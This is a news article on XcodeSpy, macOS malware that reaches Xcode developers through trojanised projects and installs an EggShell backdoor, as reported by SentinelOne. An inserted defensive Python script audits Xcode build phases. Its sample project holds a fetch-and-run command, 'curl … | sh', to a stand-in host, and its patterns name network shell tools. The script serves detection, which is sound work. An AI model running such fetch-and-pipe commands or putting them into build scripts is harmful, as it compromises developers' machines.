New macOS malware XcodeSpy found sneaking in to spy on victims

According to researchers, XcodeSpy malware is targeting Xcode developers in a supply-chain attack.

macOS, commonly regarded as secure, has again been infiltrated by malware, this time used by unknown threat actors to target developers who use the Xcode integrated development environment (IDE).


Threat actors have recently started creating malicious versions of popular projects in the hope of luring developers into including them in their applications. When these applications are compiled, the malicious component infects the developer's computer in a supply-chain attack.
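A defender's check for the build-time execution described above, as an added example that is not from the article or SentinelOne's report: it lists every Run Script build phase (`PBXShellScriptBuildPhase`) in an Xcode `project.pbxproj` and flags scripts that match a few heuristics. The assumption that the malicious component runs from such a phase, the heuristics, and the sample project text are all constructed here.

```python
import re

# Each Run Script phase: capture the quoted shellScript value (escapes intact).
PHASE_RE = re.compile(
    r'isa = PBXShellScriptBuildPhase;.*?shellScript = "((?:[^"\\]|\\.)*)";',
    re.S)

# Illustrative heuristics (assumptions, not indicators from the article).
SUSPICIOUS = {
    "network fetch": re.compile(r"\b(curl|wget|nc)\b"),
    "pipe to shell": re.compile(r"\|\s*(ba|z)?sh\b"),
    "encoded payload": re.compile(r"\b(base64|xxd)\b"),
    "dynamic eval": re.compile(r"\beval\b"),
}

# Constructed sample of a project.pbxproj section (not from a real project).
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
		AA0000000000000000000001 /* Lint */ = {
			isa = PBXShellScriptBuildPhase;
			name = Lint;
			shellPath = /bin/sh;
			shellScript = "\"${SRCROOT}/scripts/lint.sh\" --quiet\n";
		};
		AA0000000000000000000002 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			shellPath = /bin/sh;
			shellScript = "curl -s https://example.invalid/a | sh\n";
		};
/* End PBXShellScriptBuildPhase section */
'''

def unescape(value):
    """Undo pbxproj string escapes (backslash-n, backslash-t, escaped quotes)."""
    table = {"n": "\n", "t": "\t"}
    return re.sub(r"\\(.)", lambda m: table.get(m.group(1), m.group(1)),
                  value, flags=re.S)

def audit_build_scripts(pbxproj_text):
    """Return [(script, [heuristic names hit])] for every Run Script phase."""
    findings = []
    for match in PHASE_RE.finditer(pbxproj_text):
        script = unescape(match.group(1))
        hits = [name for name, rx in SUSPICIOUS.items() if rx.search(script)]
        findings.append((script, hits))
    return findings

if __name__ == "__main__":
    for script, hits in audit_build_scripts(SAMPLE_PBXPROJ):
        print("REVIEW" if hits else "ok    ", hits, repr(script))
```

Run it over the `project.pbxproj` of any third-party project before the first build; a phase with no hits still deserves a read, since the heuristics only prioritise review.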


The malware, named XcodeSpy, was disguised to deliver a custom variant of a backdoor known as EggShell, which allows its operators to spy on users. It was discovered by the IT security researchers at SentinelOne on Thursday.


This backdoor can also give the threat actors the ability to upload and download files and to capture data from the victim's camera, microphone, and keyboard.


SentinelOne's report states that the company learned about the malware from an anonymous researcher, but that it had also come across XcodeSpy in late 2020 targeting an organization in the US.


SentinelOne was informed by the victim that it is regularly targeted by threat actors linked to North Korea, and they came across the malware while conducting threat hunting activities.

Cross-referenced evidence indicates that the campaign involving XcodeSpy was active at least between July and October 2020. The malware was als ..